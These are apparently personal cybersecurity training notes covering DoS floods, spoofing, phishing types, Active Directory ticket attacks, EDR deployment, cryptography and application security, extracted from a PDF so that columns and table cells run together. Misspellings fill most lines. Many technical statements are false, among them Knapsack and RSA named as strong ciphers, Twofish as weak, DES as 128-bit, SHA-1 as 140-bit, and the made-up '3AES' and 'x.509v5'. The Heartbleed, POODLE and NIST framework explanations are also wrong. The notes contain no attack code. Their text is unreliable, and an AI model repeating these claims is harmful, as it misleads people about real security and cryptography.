1) implement rate limit or Thorttling in the permieter and also
application side
2) Implment rate limit or threashhold orthorttling as per bunies
sreuiemenr and take appropriate actions
3) implment in prarrle ISP router is ther eany malcious or abnoral
actvity f going on
40 In parallel ISP router deploy ANTI DoS and also Anti DDoS tools .

Atatcker will send more numbner or large number of UDP requests to

tagragedted machine, Thean tracggted machine will become
26) UDP flood atatck unavilable or damaged or cashsed or aunable .

Mitgation
1) Implement Anti Dos and Anti DDDOS tool sin paracllel to ISP ruoter
2) Implement Rate loimit or thorittling in the FW, WAF, or backed
server
3) Craete policy or implement NIDS/NIPS tool

Attacker will use dummy ethernet frames as folldojg or categroty so

that atatcker willsedn to tragted machine , then targated machine will
become auanvaiaklble or damged or crashed is called MAC flood
27) MAC flood attack atatck

Mitgation
1) Implement Anti Dos and Anti DDDOS tool sin paracllel to ISP ruoter
2) Implement Rate loimit or thorittling in the FW, WAF, or backed
server
3) Craete policy or implement NIDS/NIPS tool
 Attacker will sedn flooding of the huge or large or many number of the
requests targeted machine, so that targated machine will become
28) ARP flood atatck unavailable or damagaed or crashed

Mitgation
1) Implement Anti Dos and Anti DDDOS tool sin paracllel to ISP ruoter
2) Implement Rate loimit or thorittling in the FW, WAF, or backed
server
3) Craete policy or implement NIDS/NIPS tool

Atatcker will send more number of the reuest or large number of the
ICMP or PING reauests to thetragted machine , so that tragted
29) ICMP or Ping flood atatck machine will become unavailable or damaged or crashed

Mitgation
1) Implement Anti Dos and Anti DDDOS tool sin paracllel to ISP ruoter
2) Implement Rate loimit or thorittling in the FW, WAF, or backed
server
3) Craete policy or implement NIDS/NIPS tool

Attacker will send oversized packet or large number of BW packtet to

tragted macine. so that targated machine will becoem interruooted or
30) PING of death damged or crashed or unvailable

Mitgation
1) Implement Anti Dos and Anti DDDOS tool sin paracllel to ISP ruoter
2) Implement Rate loimit or thorittling in the FW, WAF, or backed
server
3) Craete policy or implement NIDS/NIPS tool
4) Always we have to use 32 byates of the packet

Single atatcker will send the flooding of the requests to targatced

machine , so that ebause of the unauthirised atatcker authorised are
31) DoS attacket users going toloose the service is called as DoSD of atatck

Mitgation
1) Implement Anti Dos and Anti DDDOS tool sin paracllel to ISP ruoter
2) Implement Rate loimit or thorittling in the FW, WAF, or backed
server
3) Craete policy or implement NIDS/NIPS tool

Multiple atatckers from mupltiple systems or single atatcker from

multiple system will tagrated single taraged machine by sending the
flooding of the request, so that targted machine become unavailble
ordamged or crashed. Because of the unathorised atatcker leaglised
or athorised users are going to loose the service is called as DDOS
32) DDoS attacker tatck

Mitgation
1) Implement Anti Dos and Anti DDDOS tool sin paracllel to ISP ruoter
2) Implement Rate loimit or thorittling in the FW, WAF, or backed
server
3) Craete policy or implement NIDS/NIPS tool

Spoofing categriry ( Masking)

Onbehalf of end use or original employee atatcker will send the
request by imporersanating or by mimic , so that attackr will gain
unauthirsed access or senstive data ecposure

Types of sppoing categroty ara 1) IP spoosfing

2) Email spoofing
3) ARP spoofing or ARP posioning atatck
4) RARP spposfing attack
5) DNS spoosfing or DNS amplification attack or DNS poisioning
attack

Onbehalf of end user or impersonating the end user attacker will send
spoofed ip addresse request backed server, backend server it will
respoind to atatcker. Insuch way atatcker will gain aunthorised access
33) IP spoofing and sensitive data exposre

Masking of the ip TOR IP - teh onion router ip

Mithgation 1) Depp acpket inspection IPV4 packet

2) Statful inspection Ip header Payload
2) EDR/XDR S.IP and D.IP Message
4) NGFW
5) Proxy

Onbehalf of end user or or impersonating atatcker wil send the request

to the recipeint and atatcrecipent will respond back to send er , sothat
34) Email spoofing atatcker will gai aunthorised access and sewnstive data exposure

Mitigation
1) Email Security solution
) Email Gateway
3) Proxy
4) NGFW

Atatcker will compomise switch in the connected oin LAN, onbehalf

switched whenver end user is giving rwequest attaclker will rspind
back, insuch way communication will happen between end user and
switch . So that atatcker will gain aunthorised access or sentive data
35) ARP spoofing ( Address resolution protocol) or ARP posioning atatck exposure

Mitgation / Remediation
1) NGFW
2) Proxy
3) NIDS/NIPS
4) Define rate limit or throttling

36) DNS spoosifing atatck or DNS posioniong atatck DNS amplification atatck

Atatcker will cp=ompromise DNS server , onbehalf of dns server or

impoersanting DNS server, whenver is giving the request inbehalg
DNS atatcker will take to deface or fake or malcious domain websites,
whenver end ise cliocking on the websistes or operating as per cyber
kill chain process emd user machine will get compromised. ich such
way atatcker will gain aunthorised access or sentive data exposure

Mitgation
1) DNS security DDI solution
2) NGFW ( DNS filtering)
3) Proxy ( DNS filtering)
4) NIDS/NIPS implementations (DNS )

Other category of the atatcks

Sharing the confidential data or sentive data in the public is called as

34) Social engineering attack social enginerring attack

Exa: Debit card

credit card
Password
Any PII data4

Mitigation
1) Srcurity awareness

Lokking into some other people shoulder and gaining the unathorised
35) Shoulder surfing access or sensitive data exposure

Mitigation
1) Srcurity awareness

Secretly listing other people conversation and gaining the unathotised

36) Evaesdropping access is called evaesdropping

Mitigation
1) Srcurity awareness

Incase if we are using weak ciphers in the application SSL/TLS

certficates or on the server side atatcker will those weak ciphers and
finnally attacker will gain aunthotised access by compromising the
37) Sweet32 attack or Vulnerability system
Example weak ciphers or weak algorithms are
1) RC4
2) RC5
3) Two fish
4) Blow fish
5)MARS
6)DES < 256bits

Mitgations
1) We have to implement storng ciphers with strong hashing
algorithms
 RSA
DH
ECC
Knapsack
DSA

If we are using any weaker versions of Open SSL/ SSL versions in the
SSL/TLS certficates , atatcker will use those weak outdated SSL
versions and he will exploit the vulnerability insuch atatckwer will gain
38) Heartbleed aunthotised access or sentive data exposure

Mitgation
1) Please use TLS latest vestions with storng hashing algorthm
TLS 1.2
TLS 1.3
2) Use striong cryptgraphy algortihms
RSA
DH
ECC
Knapsack
DSA

If we are using any weak cryptography algortihm weak hashing

algirthm atatcker will use those weak ciphers and finally atatcker will
39) POODLE ( padding oracle on downgraded legacy encryption) gain aunthorised access or senstive data exposure

Mitgation
1) Please use TLS latest vestions with storng hashing algorthm
TLS 1.2
TLS 1.3
2) Use striong cryptgraphy algortihms
RSA
DH
ECC
Knapsack
DSA

Leaking of the cionfidential or sensite data or data breacj or data

40) Data exfilteration violation is called as Data exfilteration

Personal data
PII data
PHI
Org data
1) Internal or Private
2) Restricted
3)Public

Mitigation
1) DLP solutions ( End point , Network DLP)
2) Security Awareness

User account
Atatcker will use didfferent types TTP, for gaining lower level of the
41) Privilge escalation access to highler level of the is called as Privilge escalation Service account
Exampale : Useraccount o Admin account Admin( Windows)'
Sudo (Unix)
Mitgation Root (Unix)
1) RBAC ( role based access control)
2) Segration of dutioes
3) Provide the least privge access to end user (PAM)

42) APT ( Advance perssisten Threat)

A= adavacned ( Adavanced TTP)
P= Persstent ( cintinuosuly monioring)
Th= Threat ( Weakness exploitation)

Atatcker will use advanced technologie slike tactics, techniques and

procedures and he wmoniotinr coninuoulsy and whenver weakness is
idenfified atatckler will exploit vulnerability or weakness. Insuch way
atatcker will gain unahtoised access and sentive data exposure.

Mitigations
1) ATP ( Adavance threat prevention ) solutions
2) EDR
3) NGFW
4) Proxy or webgateway
5) Malware ana;ysis tools

ASttacker will comnpromiseActive directory and he will gain

43) Golden ticket attack uanthorised access for muplite system in the organization AD

1) RBAC controls
2) Segregation of duties
3) Strong or complex policies
4) AD must access via VPN
5) Implement or configure CIS hardeng benchmark
6) Implment AV/DLP/Encryption to the AD
7) All the logs should be integrated
8) MFA should implement

Attacker will compromise Ticket granting server and onbehalf of ticket

granting server atatcker will provide TGS ( Ticket granting service )
and also Ticket granting key . Onbehalf of end user atatcker will send
the request to the AD and insuch way atatcker will gain uanthirsed
44) Silver ticket atatck access or AD comrpomise

1) RBAC controls
2) Segregation of duties
3) Strong or complex policies
4) AD must access via VPN
5) Implement or configure CIS hardeng benchmark
6) Implment AV/DLP/Encryption to the AD
7) All the logs should be integrated to SIEM tool
8) MFA should implement

Attacker will intilaly compromise one system from there atatcker will
45) Lateral movement compromise other systems as well via lAN or WAN

Mitigations
1) AV/EDR/XDR
2) Anti malware tools
3)Malware anaylisys tool
4) Email security solutions or Email gateways
5)NGFW
6)Proxy server
7)NIDS/NIPS

Atatcker will maiantain the vulnerability and he will exploit and

conitnuousyl he will be avilable in the system even though infection
47) Persistence cleaned or he will maintain foothold in the system

Moitgation
1) AV/EDR/XDR
2) Anti malware
3) Malware anayalisis tool

Attacker will maintain hiding the atragated machine even thiugh we are
48) Defenase evasion using defensive solutions

Mitgations
) EDR/XDR
Lateral movement 2) Anti malware
Previlge escaltion 3) Mlware anaysis tools
Data exfilteration
2 Techniques Persistence

Phishing email

Attacker will send malaicous email to ataragted end user and he will
trick end user , based cyber kill chain aporcess atatcker will gain
Phishisng email aunthirised access and senssitve data exposure

How we identify phishing email s 1) Lottery emails

2) Invoice copies attachments
3) Placing the order order confirmation
4) Job opportinities email s'
5) Malcious URL links
6) Malcious malware aatchments
5) Gramatical mistakes

Phsising email types 1) Spear phishing Corporate

2) Whaling Corporate
 3) Vishing Personal
4) Smishing Personal
5) Malcious url link Crporate
6) Malcious Malware atatchment Corporate
7)Quishing Corporate
8) Deepfake - AI based impersonation Personal
9) snowshoeing Personal and corporate

Attacker will send the malaicous email to either single end user or
group of the users, so that he will compormise one user system more
49 ) Spear phishing atatck than one system . Insuchway atatcker will gain aunthorised access
Example: [email protected] or [email protected] or [email protected]

Mitgations
1) Email GW / Email security solutions
A) O365 Defender
B)Proofpoint
C)MIME CAST Anti spam policy, Firewall policy and
D)IRON PORT phshing policy
2) Proxy or webgateway
3) EDR/XDR
4) NGFW
5) Security awareness by providing pHising email campign

Attacker will send the malcious email to executives or board of the

directors or senior management . So that he will trick them, insuch way
50) Whaling atatcker will gain aunthorised access or confidential data exposure
ex: CEO , CFO , CTO , CIO, CISO , directors, vice preseidents etc

Mitgations
1) Email GW / Email security solutions
A) O365 Defender
B)Proofpoint
C)MIME CAST
D)IRON PORT
2) Proxy or webgateway
3) EDR/XDR
4) NGFW
5) Security awareness by providing pHising email campign

Attacker will send maclious content via text messages or sms any
other comunication channel. Insuch way atatcker will get the confidial
51) Smishing data

Mitgations
1) Email GW / Email security solutions
A) O365 Defender
B)Proofpoint
C)MIME CAST
D)IRON PORT
2) Proxy or webgateway
3) EDR/XDR
4) NGFW
5) Security awareness by providing pHising email campign

Attacker will make a voice call and he will trick the end user and
insuch way atatcker will use it monetary fucntions and gainaing the
52) Vishing confidential data

1)Security awareness by providing pHising email campign

Atatcker will trick the end user by sending a phsing email malcious
URL link and when ever end user is clicking and it will redirect to
malcious or fake or deface website. Once end user providing input
53) Malcious URL link validation, atatcker will that data

Mitgations
1) Email GW / Email security solutions
A) O365 Defender
B)Proofpoint
C)MIME CAST
D)IRON PORT
2) Proxy or webgateway
3) EDR/XDR
4) NGFW
5) Security awareness by providing pHising email campign

Attacker will atatch malacious malware atatchment and he will send to

end users , once the end user is downloading the malware
atatchmnet, incase any vulnerability end user machine will get Phsiing email investigation + Malware
54) Malicous malware atatchment compromiserd investigation

Mitgations
1) Email GW / Email security solutions
A) O365 Defender
B)Proofpoint
C)MIME CAST
D)IRON PORT
2) Proxy or webgateway
3) EDR/XDR
4) NGFW
5) Security awareness by providing pHising email campign

Attacker will send malcious mail by providing QR code scanner

information and will ask end users to scan the code so that omce end
user scanning malcious conetent will downloaded and system will get
55) Quishing comprmised

Mitgations
1) Email GW / Email security solutions
A) O365 Defender
B)Proofpoint
C)MIME CAST
D)IRON PORT
2) Proxy or webgateway
3) EDR/XDR
4) NGFW
5) Security awareness by providing pHising email campign

Attacker will send the phsing emails from multiple malcipus ip's and
malcious domains and insuch way atatcker will trick the end user and
56) Snowshoeing ( Hit and Run) finally atatcker will gain unathirised access or sensitive data expsoure Ip addresss
outlook.tcs.com
Mitgations 1.1.1.1 example.tcs.com
1) Email GW / Email security solutions
A) O365 Defender
B)Proofpoint
C)MIME CAST
D)IRON PORT 1.1.1.2 test.tcs.com
2) Proxy or webgateway 1.1.1.3 welcome.tcs.com
3) EDR/XDR 1.1.1.4
4) NGFW 1.1.1.5
5) Security awareness by providing pHising email campign
Please idnetify your
business ip and business
6) Please gataher the business ip's and business domains information domains and whitelist
from the network team or internal stake holders and ablacklisting in those ips and those
permiters and also end point side ( NGFW, Proxy, EDR , XDR) domain names

Using artificial integience scammers or atatckers swap faces, voices,

audios and videos and finallay they will impersonate and they will
blackmail. Incase victim is not able to pay they will expose to the
57) Deep fake - AI ( artificial intelligence ) based phsihing public. Insuch way original user is going to impact
 Project life cycle maangameent Project delivery or servcie deloivery

1) Sales
2)Presales
3) Design / Architect ( HLD , LLD) Project Manager
4( Implementation
5) Operational support ( L1, L2 and L3)

Consulting or service They will work on prjects Product development

1) TCS 1) Google
2) Infosys 2)Microsoft
3) CTS 3) Amazon
4) Accebture 4) Honeywell
5) Capgemeini 5) Robert Bosch
6) Tech Mahendra 5) GE heathcare
7)HCL 7) Philips
8) Mindtree and LT 8) Schinder electrical
9) Nokia
10) Motorola

To implement AV/EDR
HSBC bank PLC Requirement is implementation End point security / EPP

Take all the end poins ( LT, MAC, WS, DT, All
servers and vm) 100000

Techmahndra - Microsoft Defender--- 600k Mindtree- Sentinel One----- 550k

TCS ( Crowdstrie-AV)--500k USD Infosys -( Mcafee )---- 450k usd HCL ( Trend micro)---475 K USD USD USD
Sales Sales Sales Sales Sales Requirement gathering
Giving the presentation comny profile or
toools with partnership , existing customer
Presales Presales Presales Presales Presales deplpyments and POC ( Proof of concept) 2 weeks
Tender or RFP ( request forproposal)
HSBC 10 porposals from TCS, infosys, hcl, Techmahndra, Mindtree, Capgemini, Accenture, CTS, CGI, Deloitte
Design/ Architect ( HLD, SDD, LLD)
Implementation LLD( Bluprint)
L1,L2,L3 ( Operational support - EDR / AV- -
Malware)

End point protection (EPP) or End point security

End user machine or host machine or emplyee

End point asset or machine
Example of end points are
1) Laptop 1000
2)Macbook 500
3) Work stattion 500
4)Desktop 500
5) Mobile 100
6) Servers 100

Protecting of all the end points or assets or or

end user machines from the hackers or from
intruders or threat actors or adversaries is called
EPP or EPS as EPP

End point securitysolutions 1) AV/EDR/XDR

2) End point DLP
3) End point encryption ( Data at rest encryption)
4) FIM
5) HIDS/HIPS
6) MDM

in Generic all end poiint security

solutions loife cycle is
Licensing Based on how many number of end points or IP's

Deployment Hardware based

Software
SaaS (Cloud)

Implementation Agent and server ( Security tool)

Vendor provided agent has to deploy in each and end use

rmachoine , when the abanormal or malcious or suspcious
activity is doing by extrernal atatcker or may internal employee
based , agent will communicate to security tool. Based policies
configured and based on the detection method defined vy vendor
Backend process security incidents will be triggered in the dash of the security tool
As End point security analyst we are taking care of security
incident investigations and foreneic analoysis

Severity of the alerts Severity Risk score

Critical 80-100
High 60-80
Medium 40-60
Low 20-40
Info 0-20

Aagent status
1) Acrtive/Online
2)Inactive
3) Sleeping
4)Unknown

Incase agent status or health check up is shoing as sleeping or

unknown or inact ive have to troubleshoot or fix the problem or
Note debug the problem

How to to troubleshoot ? 1) Verify the compiotability of OS versues Agent id deployed

2) Wake up the agent
3) Verify the configuration
4) analyze the logs
5) Unistall and reinstall
6) Raise a support case with the vendor

Down the agent from the securty tool and before installing the
PROD environment , we have to test in the devlopment or testing
envrionment whether and have to observe cpu, ram and BW
utlization and also performance relates isues and also application
Server side agent installation compitablility

Polcies should be caonfigured based on end point security

Security profiles or polcies solution

Administration, implementations,
Assign the management ip or hostname to log into the tool coinfigurations and security incident
Security tool implementation approach veirtully or remotly investigations
Default gateway
Subnet mask
Integrating with AD / LDAP (389/636)
Integrating with DNS servewrs ( Primary and Secondary)-53
Integrating with SMTP -25
Asset froup or device groups ( Based on OS)
Polcies
Dashbaords
Reports
 Install all the agents on the end points
integrating the logs to SIEM tool

Installing larger deployments can be do by using SCCM- Server center configuration manager
Security tool
WUCS - windows update central service

1) AV/EDR ( Anti Virus or End point detection and response)/XDR

AV/EDR/XDR splution will monitor or detect, prevent and block

AV/EDR/XDR and quarantine all malware category of the atatcks

It is depending how many number of end points pr IP's are

Licensing caso avaiillable

Baend process

Deployment Hardware
Sofware
SaaS

EDR / XDR/AV design 1)HLD (High level design)

2) LLD (Low level design)

HLD
1) Scope of the work EDR implementation
2) Risks
3) Assumptions
4) Desuign architecture diagram
5) Project impmenation
6) Kick of meeting
7)Traning
9) Handover

LLD
1) Scope of the work
2) Risks
3) Assumptions
4) Desuign architecture diagram
5) Project impmenation
6) Kick of meeting
7)Traning
9) Handover
Assign the management ip or hostname to
10) Impmenetation approach log into the tool veirtully or remotly
Default gateway
Subnet mask
Integrating with AD / LDAP (389/636)
Integrating with DNS servewrs ( Primary and
Secondary)-53
Integrating with SMTP -25
Asset froup or device groups ( Based on
OS)
Polcies
Dashbaords
Reports
Install all the agents on the end points
integrating the logs to SIEM tool

Imeplementation mehotd name Agent and EDR tool or agent and server based approach

Agent status Active

Inactive
Sleeping
Unknown

Agent troubleshooting 1) Verify the compiotability of OS versues Agent id deployed

2) Wake up the agent
3) Verify the configuration
4) analyze the logs
5) Unistall and reinstall
6) Raise a support case with the vendor

Down the agent from the securty tool and before installing the
PROD environment , we have to test in the devlopment or testing
envrionment whether and have to observe cpu, ram and BW
utlization and also performance relates isues and also application
Server compitablility

Security profiles EDR/XDR / policies 1) Threat prevention (Malware . HIDS/HIPS)

2) App control
3)Web control
4) Update managemt
5) DLP
6) FIM

Severity of the alerts Severity Risk score

Critical 80-100
High 60-80
Medium 40-60
Low 20-40
Info 0-20

EDR actions for security incident 1) Allow

2) Block
3) Quaranatine
4) Alert

AV/EDR/XDR logs integration to SIEM tool 1) Syslog server method

2) API token method Alerts will be triggered

Syslog
End user ar tatcker EDR tool API token method SIEM TOOL

Alerts Malware categroy correlation rules

EDR/XDR vendors 1) Crowdstrike

2) Defender from Microsoft
3) Sophos
4) Sentinel one
5) carbpn Black
6)Mcafee
7)Syamntec
8)Trend Micro
9) Resolution one
10)Kaspersky
11)Eset
 12) AVG
13)Malware bytes
14) Avast

Polcy types Default

Cutomized polices

Default policies provided by EDR/XDR vendor 1) Threat prevention (Malware and HIDS/HIPS)
2) Web control
3) Application control
4) FIM
5) Basic DLP
6) Peripheral control
7)Update management
8) Windows firewall

Dash baords Default dash baords

Customized

Reports Deafult
Cutomized
RACI

When ever any business case like end user is downliand or

coipying of the files , our EDR agen tis blocking , in that scenario
business stake stakedolders will raise a ticket with End point
security team stating that EDR agent is blocking file is going to
download. Whenver these scenaiors will arise please do below
Exceptions or exclusions actions
1) Do the malware aalysis why the EDR agent is blocking ( Using
Open source tools, Snadboxing and also using EDR tool)
2) Incase if any confusion or query on the injection side please
raise a case with the vednor and take advise from the vednor for
analysing the malwayre why EDR agent is blocking
3) Incase vendor also said that file has infection take the written Exclusion can be made using username, ip
email communication from stake holder and then only give the address, computername , file hash, filepath ,
exception or exclusion in the EDR tool file folder.

NOTE : As per RACI matrix ( Resoinsibility, Accountability,

Comsultated and Infomed) , please dont responsbility and
acccountability from security analysts side

Threat hunting Hutning of threats practively is called threya hutning

Threat hutning types
Based on Condition, based ont he bollean
algebra , [policies, logic and also based
1) Automated algorithm
2) Manual Hypothesis
Assumption
Guessing
Imagination and
Crown jewel Legacy or Old
Query based approach

Detection methods 1) signature

2) ML/AI/Beahourial apttern/ Historical analysis ( Heuristsic EDR/XDR, DL, HIDS/HIPS, FW, proxy,
apparoach) WAF, CSPM , VM, SIEM etc
3) Hash Value method
4) Sandboxing method
5) Base line method

Signature based applicable to known category of the attacks .

Vednor will maintain the regular threat intelligence feed updates
and will uodate the signature on daily basis by rpviding the
signature. When end user or atatcker will macious actvity it will
check the vedor base and finally if the signature will match it will
1) Signature block the actvity

This can be used identify new catgory of the atatcks or unknwon

category of the atatcks based baviour of the entity or asset and
user. Based on the user actvity or user action , enitty actibvity or
entity action tool will understand or tool learn the beviour and it
2) ML/AI / Beavorial Pattern will trigger the alert notification if it first tie atcivity
github.com Alert Day 1
github.com Alert Day 2 Legitimate
github.com Alert Day3

Github.com legitimate Day 30th

It sis applicabe to true postive ( system got compromised and

alert will be triggered). have to do analysis s and finally have to
block hash value in the EDR tool . Sotaht infuture it should not
3)Hash value method repeat once again

After deloying Security tool, tool will udnerastand action and

activity and gtraffic and it will form base line. Whenver bas eline is
crosssoing automatically alert will be triggered. As security
analysts we have to do analysis really it is false psotive or true
4) Base line method positve (Legitimate or illigitmate)

We have to create testing environment to test the malware

samples or to analyse malawwares in our onpremise location.
Here we have to validate malware analysis using statis analysis
5) Sandboxing method and dynamic analysis

Security incident investgations life cycle

management frameworks
When ever if we want do anys ecurity incident investoigation we
will follow two different types of frame works
1) ITIL process
2) NIST framework

ITIL NIST framework

1) Preparation 1) Detect
2)Identification 2)Identify
3)Containment 3)Protect
4)eradication 4) Recover
5)Recovery 5) Report
6) Leassons learned or post mattern report

Difference between AV/EDR/XDR

Feature AV EDR XDR
1) End point based detection,
investigation and response Yes Yes Yes
2) End piont based Malware,
exploitation and atatck prevention Partlliay Yes Yes
3) Network based detection,
investigation and response No No Yes
4) User behavorial analytics,
detection and response No Partilly Yes
5) Automated idetification of networl,
end point and cloud data imporve
and imple investigations No Partlly Full fldeged
6) Integrating with VT.COM , MITRE
attack framework, google.com amd
other open spurce tools No Yes Yes
7), Containment, Network isolation,
cleaning of the infection No Yes Yes
8. Security irchestration and
automated response (SOAR) No Partially Yes
9) Threay hinting capability,
querying No Partilly Yes
Application security
1) SDLC vs SSDLC (Software development life cycle vs Secure software
development life cycle)
2) Cryptogrpahy ( Symmetric and Assymetric cryptography)
3) WAF
4) OWASP TOP 10 (2021)

1) SDLC vs SSDLC (Software

development life cycle vs Secure
software development life cycle) Phases SDLC SSDLC (Security)
Product backlog refinement
1) Requirement Aha and Atlassian Reuirement gathering
Threat modelling
Microsoft STRIDE , PASTA, DREAD Security team after doing the threat
S- Spoofing modelling have to analyse the risk
T-Tampering assessment and Business impact analysis .
R-repudation After doing threat identifcation security team
Software architects or design team will desgin SDD , HlD, I-information disclosure has to verify Design team will accept the Atalassian,
LLD, D-Denial of sservice risk, Mitigate the risk in the same release, Manual excel,
2)Design Confluence, Jira, Aha , Atalassian E-Elavation of Prevlige Risk avaoidance, Risk transfer Jira, SNOW
1. Code scan: Forti fy , Checkmarx, IBM
appa scan, Veracode etc
Note: After analysing code issues , raise a
case with development team and ask
internal stake holders to fix
Secrity scans 2. TPS SCAN : White source, Black duck,
Code scan : 1)SAST- Static application security Snyk etc
testing or SCA (Static compaision analysis) Note: After analysing TPS issues , raise a
Feature devlopment TPS (Thirs party software) case with development team and ask
3) Development (CI/CD) Postman, Sonar Qube, Github internal stake holders to fix
Pnetration testing :
PT scanning types are : Manual and
automated
Autitamted : DAST- (Dyanamic Note:
application testing) Aftercompleting
Manual pen test tyeps are: pentest,
Black Box: With the milited information security team
security team has to indetify vulnerabilities has towith
or Threats (Ex: URL lin, Ip address etc) development
Grey Box: Providing the information and team , testers
identifying the thrests is called as Grey box and also design
White BOX: Provoiding the full details and and ask internal
VAPT - vulnerbility assessment and penetraion identifying vulnerabilities is called as White stake holders to
4) Testing Testing of feature or functional testing testing box pentration testing fix
Once the security team has sign off there are
security issues are existing, then
seniormanagemt will decide to release the
5) Operational or GA or release feature

Agile/Scrum Process
1) PO
2)DM
3)SM

PO
Facebook 1 to 1 - Video call recorder 2 Q2 2025
1 to 1 - Audio call recorder 1 Q1 2025
1 to many - Audio call recorder 3 Q3 2025
1 to Many - Video call erecorder 4 Q4 2025

DM----Devloping of the application Deleoepment 15

SM Sprint Plannning Novem3rd

Noveember 12tg
Ptach policy Crtical bugs 10 working days
High bvyulnerabilities 1 month
Medium, Low and info 3 months

Cryptography
Secure of web comunication using mathematical
calucaltions and also algorhtihms we encrypt the data and
attacker its difficult to decrypt or decipher the data

Example of cryptography
1) Encryption
2)Decruption
For encryptoing the data and decryption the data we will use two keys 1) Provate key ( Secret key)
2) Public key ( Sharable key)

Cryptography algorithms are 1) Symmetric cryptography

2) Asymmetric
3) Hybrid ( PKI)

same key used for both encryption and decryption is

Symmetric cryptography called as symmetric cryptography

ex: End point encryption ( OS), Disk encryption, DB

encryption

Adavanatages Confodentliyy or privacy

Encryption
Faster

1) It will not provide any authticitiy, integrity and non

Disadavanatages of sysmtreic cryptography repudation
2) It will use more number of keys For n number of keys n(n-1)/2
3) It will use more number keys for exchange

Example algorithsm are RC4

RC5
MARS
TWO FISH
BLOW FISH
DES - Data encryption standrada 128bit
AES- Adavanced encryption standrada 128bit and 256 bit
3AES - Adavanced encryption standrad 256bit

Two didfferent keys can be used for encryption and

Asymmetric cryptography decryption is called as Asymmetric cryptography

Adavanatages Confidentility
Authticity
Authtorization
Non repudation
Integrity

Disadavantages 1) It is slower

Example algorithms DH- Diffie helamn 512. 1024, 2048 and 4096
ECC (ELleptical curve cryptography) 512. 1024, 2048 and 4096
RSA ( Rivest, shameer and adleman ) 512. 1024, 2048 and 4096
DSA ( Digital signature algorithm) 512. 1024, 2048 and 4096
Kanpsack 512. 1024, 2048 and 4096

Symmetric cryptopgraphy Asmmetric cryptography

1) It will use two different types of keys for encryption and
1) Same key used fr both encryption and decryption decruyption
2) It will provide confientiliy, authticity, integrity, , non
2)It will provide confidentility repudiation , authirization
3) It is faster 3) It is slower
4) It will use more number of keys 4) It will less number of keys
5) For n number of keys formula n(n-1)/2 5) For n number of keys formula = 2n
example algorithms Example algorithms
RC4 RSA
RC5 DSA
TWO FISH DH
BLOW FISH Knapsack
MARS ECC
AES
3DES
DES

For choosing the correct ciphers either it is weak or strong we will use compliance
name is called as FIPS 140-2 Federated information processing standrad

It is combination of both symmetric and assymetric

3) Hybrid cryptography cryptography

Symmetric cryptography cab used for Data transfer

ASmmtric cryptography keys Key exchange

SSL/TLS mututal authtication or SSL/TLS handshake

1. End user will intiate the connection in the web browser (

Example www.hdfcbank.com)
2. Server will publoc key to end use ror client
3. 3. Symmetric keys can be used for data transfer
whatever end user is providing input validation
4. Whatever publick key shared by server , end user will
Client or end user ( Front end ) (Publick key and private key) Backed server ( Public and Private )
use that publick key and he will encrypt the data
5. Finally encryption channel form in between client and
server
6. Using server private key server it will decrypt and it will
take appropriate actions

Draw is there part of second step . We are not sure public

Draw back keys shared by an atatcker or legotimate server

If we want to eliminate the draw back who is sending the

key we can use digital certfiicates or SSL/TLS certicates

Data manipulation or aunthorised user or atatcker shoudl

Integrity not add or delete or modify or update the data

Data can be modified in two ways Knowingly or intentionally

Unknowingly or uninteniolly

Integrity is depending on 1) Hashing algorithm

2) HMAC
3) Digitial certficates

1) Hashing Ditigtial reperesrntation of the file is called as hashing

It si combination of both characters and numbers

There are 3 different types of hashing algorithm

1) MDS- Message digest 128
2) SHA 1 140
3) SHA-256 256

Passwords will store in the backend dagta base int he

Password hashing form of hash value

Hash value It is int eh form of characters and numbers Password@123

It is unique number or unknown number will be geretaed
Salt value when end user uathticating the backend db server abcd1234

Password@!23
bcde4567

2) HMAC ( Hash messge authication code) To main integertiy or data security we will HMAC
Example unathorised attacker or end user is chaning body
of the content of the file

Digital signature it will represent integrity of the end user

3)Ditgital certficates an dlao authticaity of the end user
Current version of digital singautre alsgorithm we are
using SSL/TLS certicates is x.509v5

Digital simagtures depending on SSL/TLS certficates to

maintain itegrity

SSL/TLS certficates
Types of applications
1) Internal applications It should be access via VPN 200
Anyomne can access from any where wihtout
2) Internet facing VPN

There are two different types of SSL/TLS certifcates

1) Self signed
2) Purchased CA ( Certificate authority)

If the certficate is generating in the server where the

application is hosting or else in the tool . This typs of
Self signed certifcate certticate is called as self signed

CN : Common name ( Domain name )

Address of the application deployment on top of the
server
Tenure

For internal application we will use self signed certficate Google.com 200USD
gmail.com'youtube.com
Self signed certtifcates are free of cost google calnder
googledocs.com
google metting
google maps

These SSL/TLS certficates have to pruchase from thrid

2) Puschased CA certficate pary vendor
ex: GO daddy
Digi cert
GTS
RHEL IDM
Verisign
 Example of upgrading Akamai WAF from
How can we upgarde WAF ? 8.0 to 9.0 Change GA

1) Break up the connection in between

primary and secondary
2) Upgrade the seocndary WAF to newer
version Primary 1 or 2 days
3) Upgrade Primary WAF to newer version
4) Sync up the configuration
5) Tets the high avability
7) Create the policies OWASP TOP 10
8)Onboard one application 2 3
9)Testing
10) After completing WAF implemntation security alerts or
alrms will trigger in the dash board or email notification
11) L1, L2 and l3 teams will do incident investigations
against OWASP TOP 10 alerts

Itv is an institution or organization it will conduct survey or

feedback against Application layer or Layer 7 attacks and
OWASP TOP 10 finally they will make top 10 categrory of the attacks

Where ever the end user is providing and

Input validation validating the request

Application 3 tier architecture 1) User layer ( Input validation)

2) Business or logical layer ( Development side)
3) Backend layer (DB)

HTTP resopnse code 1xx Information response

2xx status is OK successful
3xx Redirection
4xx Client side error ot issues
5xx Server side error

End point authtication SAML Serder aide ( AD/DC)

NTLM Server side ( AD/DC)
Krbrose Mutal ( Client and Server) 88

Network Radius
TCACS+

Cloud AD (IAM /PAM) ( Onpremise AD/ Cloud)

Application SAML
Open id connect
Oauth 2.0

SAML Oauth 2.0 Open ID connect

1 Open standrad for authication and authorization Open standrad and it can be used for autozation It is Open standrad it can be for autication
It is developed by Open id organization in
22 This is one is devloped by OASIS in 2001 Developed by Teitter and Google in 2006 2014
SSO ( Sisgnel sisgn on ) on enterprise level
3 Ex: OKTA API authorization SSO for consumrer apps
4 XML Json Json

Oautho 2.0 woth Open id connect ( Token based

Current authtication mechanism on the application side is authication mechanism)

Ex: Microsoft
Ping indetity
FOrgerock
ZTNA ( Zero trust network access tools)

Which payload or domian or contect we have to allow or

Conetent security policy block

Cookies HTTP only Clear text or plain text

HTTPS only Encrtpted text

JWT token JSON toekn based

It is preventive mechanism can be implemented

organizatiosn to milead or miused or mis guide
atatcker we can use defensive or preventive
Anto token ( Honey pot) control

It is unquire for each and very application category of the

